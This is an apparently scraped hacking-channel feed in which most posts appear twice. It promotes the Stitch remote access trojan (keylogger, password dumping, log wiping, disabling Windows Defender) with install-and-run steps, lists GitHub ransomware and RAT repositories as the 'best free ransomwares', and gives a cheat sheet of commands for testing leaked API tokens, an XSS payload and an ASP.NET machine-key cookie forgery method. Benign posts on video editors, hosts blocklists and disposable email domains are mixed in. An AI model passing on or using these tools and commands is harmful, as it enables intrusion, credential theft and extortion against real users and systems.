Forwarded from UNDERCODE NEWS
Be aware of storing sensitive informations on SK Hynix and LG Electronics , both were hacked and 50GB confidential files were encrypted and extorted
#DataBreaches
#DataBreaches
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦DANGEROUS HACKING 2020
F E A T U R E S :
Cross Platform Support
Command and file auto-completion
Antivirus detection
Able to turn off/on display monitors
Hide/unhide files and directories
View/edit the hosts file
View all the systems environment variables
Keylogger with options to view status, start, stop and dump the logs onto your host system
View the location and other information of the target machine
Execute custom python scripts which return whatever you print to screen
Screenshots
Virtual machine detection
Download/Upload files to and from the target system
Attempt to dump the systems password hashes
Payloads' properties are "disguised" as other known programs
Display a user/password dialog box to obtain user password
Dump passwords saved via Chrome
Clear the System, Security, and Application logs
Enable/Disable services such as RDP,UAC, and Windows Defender
Edit the accessed, created, and modified properties of files
Create a custom popup box
View connected webcam and take snapshots
View past connected wifi connections along with their passwords
View information about drives connected
View summary of registry values such as DEP
Mac OSX Specific
Display a user/password dialog box to obtain user password
Change the login text at the user's login screen
Webcam snapshots
Mac OSX/Linux Specific
SSH from the target machine into another host
Run sudo commands
Attempt to bruteforce the user's password using the passwords list found in Tools/
Webcam snapshots? (untested on Linux)
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/nathanlopez/Stitch.git
2) cd Stitch
3) # for Windows
pip install -r win_requirements.txt
# for Mac OSX
pip install -r osx_requirements.txt
# for Linux
pip install -r lnx_requirements.txt
4) python main.py
U S E F O R L E A R N
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦DANGEROUS HACKING 2020
F E A T U R E S :
Cross Platform Support
Command and file auto-completion
Antivirus detection
Able to turn off/on display monitors
Hide/unhide files and directories
View/edit the hosts file
View all the systems environment variables
Keylogger with options to view status, start, stop and dump the logs onto your host system
View the location and other information of the target machine
Execute custom python scripts which return whatever you print to screen
Screenshots
Virtual machine detection
Download/Upload files to and from the target system
Attempt to dump the systems password hashes
Payloads' properties are "disguised" as other known programs
Display a user/password dialog box to obtain user password
Dump passwords saved via Chrome
Clear the System, Security, and Application logs
Enable/Disable services such as RDP,UAC, and Windows Defender
Edit the accessed, created, and modified properties of files
Create a custom popup box
View connected webcam and take snapshots
View past connected wifi connections along with their passwords
View information about drives connected
View summary of registry values such as DEP
Mac OSX Specific
Display a user/password dialog box to obtain user password
Change the login text at the user's login screen
Webcam snapshots
Mac OSX/Linux Specific
SSH from the target machine into another host
Run sudo commands
Attempt to bruteforce the user's password using the passwords list found in Tools/
Webcam snapshots? (untested on Linux)
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/nathanlopez/Stitch.git
2) cd Stitch
3) # for Windows
pip install -r win_requirements.txt
# for Mac OSX
pip install -r osx_requirements.txt
# for Linux
pip install -r lnx_requirements.txt
4) python main.py
U S E F O R L E A R N
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - nathanlopez/Stitch: Python Remote Administration Tool (RAT)
Python Remote Administration Tool (RAT). Contribute to nathanlopez/Stitch development by creating an account on GitHub.
Forwarded from UNDERCODE NEWS
According to the .ru zone: why ransomware bypass the Russian domain
#Malwares
#Malwares
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦BEST ANDROID VIDEO EDITOR 2020 :
https://play.google.com/store/apps/details?id=com.wondershare.filmorago
https://play.google.com/store/apps/details?id=com.adobe.premiereclip
https://play.google.com/store/apps/details?id=com.xvideostudio.videoeditor
https://play.google.com/store/apps/details?id=com.cyberlink.powerdirector.DRA140225_01
https://play.google.com/store/apps/details?id=com.nexstreaming.app.kinemasterfree
https://play.google.com/store/apps/details?id=com.stupeflix.replay
https://play.google.com/store/apps/details?id=com.quvideo.xiaoying
https://play.google.com/store/apps/details?id=com.avcrbt.funimate
https://play.google.com/store/apps/details?id=com.magisto
https://play.google.com/store/apps/details?id=com.alivestory.android.alive
https://play.google.com/store/apps/details?id=com.funcamerastudio.videomaker
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦BEST ANDROID VIDEO EDITOR 2020 :
https://play.google.com/store/apps/details?id=com.wondershare.filmorago
https://play.google.com/store/apps/details?id=com.adobe.premiereclip
https://play.google.com/store/apps/details?id=com.xvideostudio.videoeditor
https://play.google.com/store/apps/details?id=com.cyberlink.powerdirector.DRA140225_01
https://play.google.com/store/apps/details?id=com.nexstreaming.app.kinemasterfree
https://play.google.com/store/apps/details?id=com.stupeflix.replay
https://play.google.com/store/apps/details?id=com.quvideo.xiaoying
https://play.google.com/store/apps/details?id=com.avcrbt.funimate
https://play.google.com/store/apps/details?id=com.magisto
https://play.google.com/store/apps/details?id=com.alivestory.android.alive
https://play.google.com/store/apps/details?id=com.funcamerastudio.videomaker
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
Google Play
Filmora: AI Video Editor&Maker - Apps on Google Play
AI Video EditorοΌAI Music, Text to Video,Text to Speech,Auto Caption,Video Effect
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Best Free Ransomwares :
https://github.com/fabrimagic72/malware-samples
https://github.com/NYAN-x-CAT/Lime-RAT
https://github.com/mauri870/ransomware
https://github.com/deadPix3l/CryptSky
https://github.com/tarcisio-marinho/GonnaCry
https://github.com/sithis993/Crypter
https://github.com/wille/cry
https://github.com/NullArray/Cypher
https://github.com/leonv024/RAASNet
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Best Free Ransomwares :
https://github.com/fabrimagic72/malware-samples
https://github.com/NYAN-x-CAT/Lime-RAT
https://github.com/mauri870/ransomware
https://github.com/deadPix3l/CryptSky
https://github.com/tarcisio-marinho/GonnaCry
https://github.com/sithis993/Crypter
https://github.com/wille/cry
https://github.com/NullArray/Cypher
https://github.com/leonv024/RAASNet
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - fabrimagic72/malware-samples: A collection of malware samples caught by several honeypots i manage
A collection of malware samples caught by several honeypots i manage - fabrimagic72/malware-samples
Forwarded from WEB UNDERCODE - PRIVATE
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦API Key Leaks 2020 :
1) Algolia
curl --request PUT \
--url https://<application-id>-1.algolianet.com/1/indexes/<example-index>/settings \
--header 'content-type: application/json' \
--header 'x-algolia-api-key: <example-key>' \
--header 'x-algolia-application-id: <example-application-id>' \
--data '{"highlightPreTag": "<script>alert(1);</script>"}'
2) AWS Access Key ID & Secret
> git clone https://github.com/andresriancho/enumerate-iam
> cd enumerate-iam
.>./enumerate-iam.py --access-key AKIA... --secret-key X XX..
3) Slack API Token
> curl -sX POST "https://slack.com/api/auth.test?token=xoxp-TOKEN_HERE&pretty=1"
4) Facebook Access Token
curl https://developers.facebook.com/tools/debug/accesstoken/?access_token=ACCESS_TOKEN_HERE&version=v3.2
5) Github client id and client secret
curl 'https://api.github.com/users/whatever?client_id=xxxx&client_secret=yyyy'
6) Twilio Account_sid and Auth token
> curl -X GET 'https://api.twilio.com/2010-04-01/
> Accounts.json' -u ACCOUNT_SID:AUTH_TOKEN
7) Twitter API Secret
curl -u 'API key:API secret key' --data 'grant_type=client_credentials' 'https://api.twitter.com/oauth2/token'
8) Twitter Bearer Token
> curl --request GET --url https://api.twitter.com/1.1/account_activity/all/subscriptions/count.json --header 'authorization: Bearer TOKEN'
9) Gitlab Personal Access Token
curl "https://gitlab.example.com/api/v4/projects?private_token=<your_access_token>"
10) HockeyApp API Token
curl -H "X-HockeyAppToken: ad136912c642076b0d1f32ba161f1846b2c" https://rink.hockeyapp.net/api/2/apps/2021bdf2671ab09174c1de5ad147ea2ba4
11) Auth Bypass using pre-published Machine Key
By default, ASP.NET creates a Forms Authentication Ticket with unique a username associated with it, Date and Time at which the ticket was issued and expires. So, all you need is just a unique username and a machine key to create a forms authentication token
12) That machine key is used for encryption and decryption of forms authentication cookie data and view-state data, and for verification of out-of-process session state identification.
Example of a machineKey from https://docs.microsoft.com/en-us/iis/troubleshoot/security-issues/troubleshooting-forms-authentication.
<machineKey validationKey="87AC8F432C8DB844A4EFD024301AC1AB5808BEE9D1870689B63794D33EE3B55CDB315BB480721A107187561F388C6BEF5B623BF31E2E725FC3F3F71A32BA5DFC" decryptionKey="E001A307CCC8B1ADEA2C55B1246CDCFE8579576997FF92E7" validation="SHA1" />
Exploit with Blacklist3r
π¦ decrypt cookie :
$ AspDotNetWrapper.exe --keypath C:\MachineKey.txt --cookie XXXXXXX_XXXXX-XXXXX --decrypt --purpose=owin.cookie --valalgo=hmacsha512 --decalgo=aes
# encrypt cookie (edit Decrypted.txt)
$ AspDotNetWrapper.exe --decryptDataFilePath C:\DecryptedText.txt
β git 2020
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦API Key Leaks 2020 :
1) Algolia
curl --request PUT \
--url https://<application-id>-1.algolianet.com/1/indexes/<example-index>/settings \
--header 'content-type: application/json' \
--header 'x-algolia-api-key: <example-key>' \
--header 'x-algolia-application-id: <example-application-id>' \
--data '{"highlightPreTag": "<script>alert(1);</script>"}'
2) AWS Access Key ID & Secret
> git clone https://github.com/andresriancho/enumerate-iam
> cd enumerate-iam
.>./enumerate-iam.py --access-key AKIA... --secret-key X XX..
3) Slack API Token
> curl -sX POST "https://slack.com/api/auth.test?token=xoxp-TOKEN_HERE&pretty=1"
4) Facebook Access Token
curl https://developers.facebook.com/tools/debug/accesstoken/?access_token=ACCESS_TOKEN_HERE&version=v3.2
5) Github client id and client secret
curl 'https://api.github.com/users/whatever?client_id=xxxx&client_secret=yyyy'
6) Twilio Account_sid and Auth token
> curl -X GET 'https://api.twilio.com/2010-04-01/
> Accounts.json' -u ACCOUNT_SID:AUTH_TOKEN
7) Twitter API Secret
curl -u 'API key:API secret key' --data 'grant_type=client_credentials' 'https://api.twitter.com/oauth2/token'
8) Twitter Bearer Token
> curl --request GET --url https://api.twitter.com/1.1/account_activity/all/subscriptions/count.json --header 'authorization: Bearer TOKEN'
9) Gitlab Personal Access Token
curl "https://gitlab.example.com/api/v4/projects?private_token=<your_access_token>"
10) HockeyApp API Token
curl -H "X-HockeyAppToken: ad136912c642076b0d1f32ba161f1846b2c" https://rink.hockeyapp.net/api/2/apps/2021bdf2671ab09174c1de5ad147ea2ba4
11) Auth Bypass using pre-published Machine Key
By default, ASP.NET creates a Forms Authentication Ticket with unique a username associated with it, Date and Time at which the ticket was issued and expires. So, all you need is just a unique username and a machine key to create a forms authentication token
12) That machine key is used for encryption and decryption of forms authentication cookie data and view-state data, and for verification of out-of-process session state identification.
Example of a machineKey from https://docs.microsoft.com/en-us/iis/troubleshoot/security-issues/troubleshooting-forms-authentication.
<machineKey validationKey="87AC8F432C8DB844A4EFD024301AC1AB5808BEE9D1870689B63794D33EE3B55CDB315BB480721A107187561F388C6BEF5B623BF31E2E725FC3F3F71A32BA5DFC" decryptionKey="E001A307CCC8B1ADEA2C55B1246CDCFE8579576997FF92E7" validation="SHA1" />
Exploit with Blacklist3r
π¦ decrypt cookie :
$ AspDotNetWrapper.exe --keypath C:\MachineKey.txt --cookie XXXXXXX_XXXXX-XXXXX --decrypt --purpose=owin.cookie --valalgo=hmacsha512 --decalgo=aes
# encrypt cookie (edit Decrypted.txt)
$ AspDotNetWrapper.exe --decryptDataFilePath C:\DecryptedText.txt
β git 2020
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦A hosts file for use on any operating system to block bad domains out of your servers or devices:
WHAT IS A HOSTS FILE?
1) A hosts file, named hosts (with no file extension), is a plain-text file used by all operating systems to map hostnames to IP addresses.
2) In most operating systems, the hosts file is preferential to DNS. Therefore if a domain name is resolved by the hosts file, the request never leaves your computer.
3) Having a smart hosts file goes a long way towards blocking malware, adware, ransomware, porn and other nuisance web sites.
4) A hosts file like this causes any lookups to any of the listed domains to resolve back to your localhost so it prevents any outgoing connections to the listed domains.
π¦WHERE DO I PUT THIS ON MY COMPUTER?
1) To modify your current hosts file, look for it in the following places and modify it with a text editor.
Linux, Mac OS X, iOS, Android: /etc/hosts folder.
2) Windows Systems: %SystemRoot%\system32\drivers\etc\hosts folder.
Β»DOWNLOAD FREE :
https://github.com/mitchellkrogza/Badd-Boyz-Hosts
enjoy β€οΈππ»
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦A hosts file for use on any operating system to block bad domains out of your servers or devices:
WHAT IS A HOSTS FILE?
1) A hosts file, named hosts (with no file extension), is a plain-text file used by all operating systems to map hostnames to IP addresses.
2) In most operating systems, the hosts file is preferential to DNS. Therefore if a domain name is resolved by the hosts file, the request never leaves your computer.
3) Having a smart hosts file goes a long way towards blocking malware, adware, ransomware, porn and other nuisance web sites.
4) A hosts file like this causes any lookups to any of the listed domains to resolve back to your localhost so it prevents any outgoing connections to the listed domains.
π¦WHERE DO I PUT THIS ON MY COMPUTER?
1) To modify your current hosts file, look for it in the following places and modify it with a text editor.
Linux, Mac OS X, iOS, Android: /etc/hosts folder.
2) Windows Systems: %SystemRoot%\system32\drivers\etc\hosts folder.
Β»DOWNLOAD FREE :
https://github.com/mitchellkrogza/Badd-Boyz-Hosts
enjoy β€οΈππ»
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - mitchellkrogza/Badd-Boyz-Hosts: A hosts file for use on any operating system to block bad domains out of your serversβ¦
A hosts file for use on any operating system to block bad domains out of your servers or devices. - mitchellkrogza/Badd-Boyz-Hosts
Forwarded from WEB UNDERCODE - PRIVATE
List of 100+ Cyber Security RSS Feeds.pdf
1.5 MB
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦TOPIC FREE SECURITY UTILITIES :
https://github.com/mitchellkrogza/nginx-ultimate-bad-bot-blocker
https://github.com/mitchellkrogza/apache-ultimate-bad-bot-blocker
https://github.com/mitchellkrogza/Ultimate.Hosts.Blacklist
https://github.com/mitchellkrogza/Stop.Google.Analytics.Ghost.Spam.HOWTO
https://github.com/mitchellkrogza/fail2ban-useful-scripts
https://github.com/mitchellkrogza/linux-server-administration-scripts
https://github.com/mitchellkrogza/Travis-CI-Nginx-for-Testing-Nginx-Configuration
https://github.com/mitchellkrogza/Travis-CI-for-Apache-For-Testing-Apache-and-PHP-Configurations
https://github.com/mitchellkrogza/Fail2Ban-Blacklist-JAIL-for-Repeat-Offenders-with-Perma-Extended-Banning
https://github.com/funilrys/funceble
https://github.com/funilrys/PyFunceble
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦TOPIC FREE SECURITY UTILITIES :
https://github.com/mitchellkrogza/nginx-ultimate-bad-bot-blocker
https://github.com/mitchellkrogza/apache-ultimate-bad-bot-blocker
https://github.com/mitchellkrogza/Ultimate.Hosts.Blacklist
https://github.com/mitchellkrogza/Stop.Google.Analytics.Ghost.Spam.HOWTO
https://github.com/mitchellkrogza/fail2ban-useful-scripts
https://github.com/mitchellkrogza/linux-server-administration-scripts
https://github.com/mitchellkrogza/Travis-CI-Nginx-for-Testing-Nginx-Configuration
https://github.com/mitchellkrogza/Travis-CI-for-Apache-For-Testing-Apache-and-PHP-Configurations
https://github.com/mitchellkrogza/Fail2Ban-Blacklist-JAIL-for-Repeat-Offenders-with-Perma-Extended-Banning
https://github.com/funilrys/funceble
https://github.com/funilrys/PyFunceble
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - mitchellkrogza/nginx-ultimate-bad-bot-blocker: Nginx Block Bad Bots, Spam Referrer Blocker, Vulnerability Scanners, Userβ¦
Nginx Block Bad Bots, Spam Referrer Blocker, Vulnerability Scanners, User-Agents, Malware, Adware, Ransomware, Malicious Sites, with anti-DDOS, Wordpress Theme Detector Blocking and Fail2Ban Jail f...
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Simple program for detecting if host(s) are vulnerable to SMB exploit(MS17-010)
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/jflyup/goMS17-010.git
2) cd goMS17-010
3) goMS17-010 detects if host(s) is vulnerable to SMB exploit(MS17-010), which is used by NSA hacking tools leaked by Shadow Brokers.
4) If it's vulnerable, then checks if the target machine is running the Double Pulsar SMB backdoor. Inspired by this Metasploit module, but doesn't depend on MSF or any framework, just run ms17-010.go or ms17-010.py with option(s).
5) Go version is preferred as it's very fast (credit goroutine for that! ) when scanning a network. The release is built from go code.
C O M M A N D S :
-i, detect single host
-n, scan a whole network in CIDR Notation, for example, 192.168.1.1/24
-h, show help
use for learn !!!!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Simple program for detecting if host(s) are vulnerable to SMB exploit(MS17-010)
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/jflyup/goMS17-010.git
2) cd goMS17-010
3) goMS17-010 detects if host(s) is vulnerable to SMB exploit(MS17-010), which is used by NSA hacking tools leaked by Shadow Brokers.
4) If it's vulnerable, then checks if the target machine is running the Double Pulsar SMB backdoor. Inspired by this Metasploit module, but doesn't depend on MSF or any framework, just run ms17-010.go or ms17-010.py with option(s).
5) Go version is preferred as it's very fast (credit goroutine for that! ) when scanning a network. The release is built from go code.
C O M M A N D S :
-i, detect single host
-n, scan a whole network in CIDR Notation, for example, 192.168.1.1/24
-h, show help
use for learn !!!!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
jflyup/goMS17-010
Simple program for detecting if host(s) are vulnerable to SMB exploit(MS17-010) - jflyup/goMS17-010
Forwarded from WEB UNDERCODE - PRIVATE
CloudFront Hijacking.pdf
1022.4 KB
time exploring the issue of CloudFront domain hijacking. This is not a new issue but I think it has gone mostly unnoticed for a few reasons ...
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦-}Cloud Hacking{-
Easily deploy static sites created using Hugo to any cloud instance of choice!
Easily deploy static sites created using Hugo to any cloud instance of choice!
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) download or clone https://github.com/souvikhaldar/cloudhack
2) Create a cloud instance and assign it your system's public SSH key (generally stored in ~/.ssh/id_rsa.pb)
3) Copy the public ssh key of this droplet to the GitHub account which has the contents for the site. (if the content is stored in local, it is advised to store it in Github as a repository).
4) Install Ansible on your machine. On Mac, you can install ansible using its brew package manager- brew
5) install ansible
6) cd into the cloned repo i.e cloudhack/ then add executable permission to deploy.sh and conf<OS> by running chmod +x deploy.sh and chmod +x confLinux.
7) ./conf<OS> -ip <ip> -repo <repo-url> eg confMac -ip <ip> -repo <repo-url> on Mac.
./deploy.sh
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦-}Cloud Hacking{-
Easily deploy static sites created using Hugo to any cloud instance of choice!
Easily deploy static sites created using Hugo to any cloud instance of choice!
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) download or clone https://github.com/souvikhaldar/cloudhack
2) Create a cloud instance and assign it your system's public SSH key (generally stored in ~/.ssh/id_rsa.pb)
3) Copy the public ssh key of this droplet to the GitHub account which has the contents for the site. (if the content is stored in local, it is advised to store it in Github as a repository).
4) Install Ansible on your machine. On Mac, you can install ansible using its brew package manager- brew
5) install ansible
6) cd into the cloned repo i.e cloudhack/ then add executable permission to deploy.sh and conf<OS> by running chmod +x deploy.sh and chmod +x confLinux.
7) ./conf<OS> -ip <ip> -repo <repo-url> eg confMac -ip <ip> -repo <repo-url> on Mac.
./deploy.sh
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - souvikhaldar/cloudhack: A tool using which you can deploy hugo static site to a cloud of choice
A tool using which you can deploy hugo static site to a cloud of choice - GitHub - souvikhaldar/cloudhack: A tool using which you can deploy hugo static site to a cloud of choice
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Updated List free temporary-email-address-domains :
http://www.yopmail.com/en/
https://getnada.com/
https://www.throwawaymail.com/en
https://www.mohmal.com/en
https://www.guerrillamail.com/
https://www.e4ward.com/
https://temp-mail.org/
https://www.mailinator.com/
https://10minutemail.com/
https://www.emailondeck.com/
a-bc.net
afrobacon.com
ajaxapp.net
amilegit.com
amiri.net
amiriindustries.com
anonbox.net
anonymbox.com
antichef.com
antichef.net
antispam.de
baxomale.ht.cx
beefmilk.com
binkmail.com
bio-muesli.net
bobmail.info
bodhi.lawlita.com
bofthew.com
brefmail.com
broadbandninja.com
bsnow.net
bugmenot.com
bumpymail.com
casualdx.com
centermail.com
centermail.net
mailnull.com
mailshell.com
mailsiphon.com
mailslite.com
mailzilla.com
mailzilla.org
mbx.cc
mega.zik.dj
meinspamschutz.de
meltmail.com
messagebeamer.de
mierdamail.com
mintemail.com
moburl.com
moncourrier.fr.nf
monemail.fr.nf
monmail.fr.nf
msa.minsmail.com
mt2009.com
mx0.wwwnew.eu
mycleaninbox.net
mypartyclip.de
myphantomemail.com
myspaceinc.com
myspaceinc.net
myspaceinc.org
myspacepimpedup.com
myspamless.com
mytrashmail.com
neomailbox.com
nepwk.com
nervmich.net
nervtmich.net
netmails.com
netmails.net
netzidiot.de
neverbox.com
no-spam.ws
nobulk.com
noclickemail.com
nogmailspam.info
nomail.xl.cx
nomail2me.com
nomorespamemails.com
nospam.ze.tc
nospam4.us
nospamfor.us
nospamthanks.info
notmailinator.com
nowmymail.com
nurfuerspam.de
nus.edu.sg
nwldx.com
objectmail.com
obobbo.com
oneoffemail.com
onewaymail.com
online.ms
oopi.org
ordinaryamerican.net
otherinbox.com
ourklips.com
outlawspam.com
ovpn.to
owlpic.com
pancakemail.com
pimpedupmyspace.com
pjjkp.com
politikerclub.de
poofy.org
pookmail.com
privacy.net
proxymail.eu
prtnx.com
punkass.com
PutThisInYourSpamDatabase.com
qq.com
quickinbox.com
rcpt.at
recode.me
recursor.net
regbypass.com
regbypass.comsafe-mail.net
rejectmail.com
rklips.com
rmqkr.net
rppkn.com
rtrtr.com
s0ny.net
safe-mail.net
safersignup.de
safetymail.info
safetypost.de
sandelf.de
saynotospams.com
selfdestructingmail.com
SendSpamHere.com
sharklasers.com
shiftmail.com
shitmail.me
shortmail.net
sibmail.com
skeefmail.com
slaskpost.se
slopsbox.com
smellfear.com
snakemail.com
sneakemail.com
sofimail.com
sofort-mail.de
sogetthis.com
soodonims.com
spam.la
spam.su
spamavert.com
spambob.com
spambob.net
spambob.org
spambog.com
spambog.de
spambog.ru
spambox.info
spambox.irishspringrealty.com
spambox.us
spamcannon.com
spamcannon.net
spamcero.com
spamcon.org
spamcorptastic.com
spamcowboy.com
spamcowboy.net
spamcowboy.org
spamday.com
spamex.com
spamfree24.com
spamfree24.de
spamfree24.eu
spamfree24.info
spamfree24.net
spamfree24.org
SpamHereLots.com
SpamHerePlease.com
spamhole.com
spamify.com
spaminator.de
spamkill.info
spaml.com
spaml.de
spammotel.com
spamobox.com
spamoff.de
spamslicer.com
spamspot.com
spamthis.co.uk
spamthisplease.com
spamtrail.com
speed.1s.fr
supergreatmail.com
supermailer.jp
suremail.info
teewars.org
teleworm.com
tempalias.com
tempe-mail.com
tempemail.biz
tempemail.com
TempEMail.net
tempinbox.co.uk
tempinbox.com
tempmail.it
tempmail2.com
tempomail.fr
temporarily.de
temporarioemail.com.br
temporaryemail.net
temporaryforwarding.com
temporaryinbox.com
thanksnospam.info
thankyou2010.com
thisisnotmyrealemail.com
throwawayemailaddress.com
tilien.com
tmailinator.com
tradermail.info
trash-amil.com
trash-mail.at
trash-mail.com
trash-mail.de
trash2009.com
trashemail.de
trashmail.at
trashmail.com
trashmail.de
trashmail.me
trashmail.net
trashmail.org
trashmail.ws
trashmailer.com
trashymail.com
trashymail.net
trillianpro.com
turual.com
twinmail.de
tyldd.com
uggsrock.com
upliftnow.com
uplipht.com
venompen.com
veryrealemail.com
viditag.com
viewcastmedia.com
viewcastmedia.net
viewcastmedia.org
webm4il.info
wegwerfadresse.de
wegwerfemail.de
wegwerfmail.de
wegwerfmail.net
wegwerfmail.org
wetrainbayarea.com
wetrainbayarea.org
wh4f.org
whyspam.me
willselfdestruct.com
winemaven.info
wronghead.com
wuzup.net
wuzupmail.net
www.e4ward.com
www.gishpuppy.com
www.mailinator.com
wwwnew.eu
xagloo.com
xemaps.com
xents.com
xmaily.com
xoxy.net
yep.it
π¦Updated List free temporary-email-address-domains :
http://www.yopmail.com/en/
https://getnada.com/
https://www.throwawaymail.com/en
https://www.mohmal.com/en
https://www.guerrillamail.com/
https://www.e4ward.com/
https://temp-mail.org/
https://www.mailinator.com/
https://10minutemail.com/
https://www.emailondeck.com/
a-bc.net
afrobacon.com
ajaxapp.net
amilegit.com
amiri.net
amiriindustries.com
anonbox.net
anonymbox.com
antichef.com
antichef.net
antispam.de
baxomale.ht.cx
beefmilk.com
binkmail.com
bio-muesli.net
bobmail.info
bodhi.lawlita.com
bofthew.com
brefmail.com
broadbandninja.com
bsnow.net
bugmenot.com
bumpymail.com
casualdx.com
centermail.com
centermail.net
mailnull.com
mailshell.com
mailsiphon.com
mailslite.com
mailzilla.com
mailzilla.org
mbx.cc
mega.zik.dj
meinspamschutz.de
meltmail.com
messagebeamer.de
mierdamail.com
mintemail.com
moburl.com
moncourrier.fr.nf
monemail.fr.nf
monmail.fr.nf
msa.minsmail.com
mt2009.com
mx0.wwwnew.eu
mycleaninbox.net
mypartyclip.de
myphantomemail.com
myspaceinc.com
myspaceinc.net
myspaceinc.org
myspacepimpedup.com
myspamless.com
mytrashmail.com
neomailbox.com
nepwk.com
nervmich.net
nervtmich.net
netmails.com
netmails.net
netzidiot.de
neverbox.com
no-spam.ws
nobulk.com
noclickemail.com
nogmailspam.info
nomail.xl.cx
nomail2me.com
nomorespamemails.com
nospam.ze.tc
nospam4.us
nospamfor.us
nospamthanks.info
notmailinator.com
nowmymail.com
nurfuerspam.de
nus.edu.sg
nwldx.com
objectmail.com
obobbo.com
oneoffemail.com
onewaymail.com
online.ms
oopi.org
ordinaryamerican.net
otherinbox.com
ourklips.com
outlawspam.com
ovpn.to
owlpic.com
pancakemail.com
pimpedupmyspace.com
pjjkp.com
politikerclub.de
poofy.org
pookmail.com
privacy.net
proxymail.eu
prtnx.com
punkass.com
PutThisInYourSpamDatabase.com
qq.com
quickinbox.com
rcpt.at
recode.me
recursor.net
regbypass.com
regbypass.comsafe-mail.net
rejectmail.com
rklips.com
rmqkr.net
rppkn.com
rtrtr.com
s0ny.net
safe-mail.net
safersignup.de
safetymail.info
safetypost.de
sandelf.de
saynotospams.com
selfdestructingmail.com
SendSpamHere.com
sharklasers.com
shiftmail.com
shitmail.me
shortmail.net
sibmail.com
skeefmail.com
slaskpost.se
slopsbox.com
smellfear.com
snakemail.com
sneakemail.com
sofimail.com
sofort-mail.de
sogetthis.com
soodonims.com
spam.la
spam.su
spamavert.com
spambob.com
spambob.net
spambob.org
spambog.com
spambog.de
spambog.ru
spambox.info
spambox.irishspringrealty.com
spambox.us
spamcannon.com
spamcannon.net
spamcero.com
spamcon.org
spamcorptastic.com
spamcowboy.com
spamcowboy.net
spamcowboy.org
spamday.com
spamex.com
spamfree24.com
spamfree24.de
spamfree24.eu
spamfree24.info
spamfree24.net
spamfree24.org
SpamHereLots.com
SpamHerePlease.com
spamhole.com
spamify.com
spaminator.de
spamkill.info
spaml.com
spaml.de
spammotel.com
spamobox.com
spamoff.de
spamslicer.com
spamspot.com
spamthis.co.uk
spamthisplease.com
spamtrail.com
speed.1s.fr
supergreatmail.com
supermailer.jp
suremail.info
teewars.org
teleworm.com
tempalias.com
tempe-mail.com
tempemail.biz
tempemail.com
TempEMail.net
tempinbox.co.uk
tempinbox.com
tempmail.it
tempmail2.com
tempomail.fr
temporarily.de
temporarioemail.com.br
temporaryemail.net
temporaryforwarding.com
temporaryinbox.com
thanksnospam.info
thankyou2010.com
thisisnotmyrealemail.com
throwawayemailaddress.com
tilien.com
tmailinator.com
tradermail.info
trash-amil.com
trash-mail.at
trash-mail.com
trash-mail.de
trash2009.com
trashemail.de
trashmail.at
trashmail.com
trashmail.de
trashmail.me
trashmail.net
trashmail.org
trashmail.ws
trashmailer.com
trashymail.com
trashymail.net
trillianpro.com
turual.com
twinmail.de
tyldd.com
uggsrock.com
upliftnow.com
uplipht.com
venompen.com
veryrealemail.com
viditag.com
viewcastmedia.com
viewcastmedia.net
viewcastmedia.org
webm4il.info
wegwerfadresse.de
wegwerfemail.de
wegwerfmail.de
wegwerfmail.net
wegwerfmail.org
wetrainbayarea.com
wetrainbayarea.org
wh4f.org
whyspam.me
willselfdestruct.com
winemaven.info
wronghead.com
wuzup.net
wuzupmail.net
www.e4ward.com
www.gishpuppy.com
www.mailinator.com
wwwnew.eu
xagloo.com
xemaps.com
xents.com
xmaily.com
xoxy.net
yep.it
YOPmail
YOPmail - Disposable Email Address - Anonymous and temporary inbox
YOPmail provides Disposable Email addresses to protect you against Spam. These temporary email addresses are completely anonymous. Stay Protected always!
yogamaven.com
yopmail.com
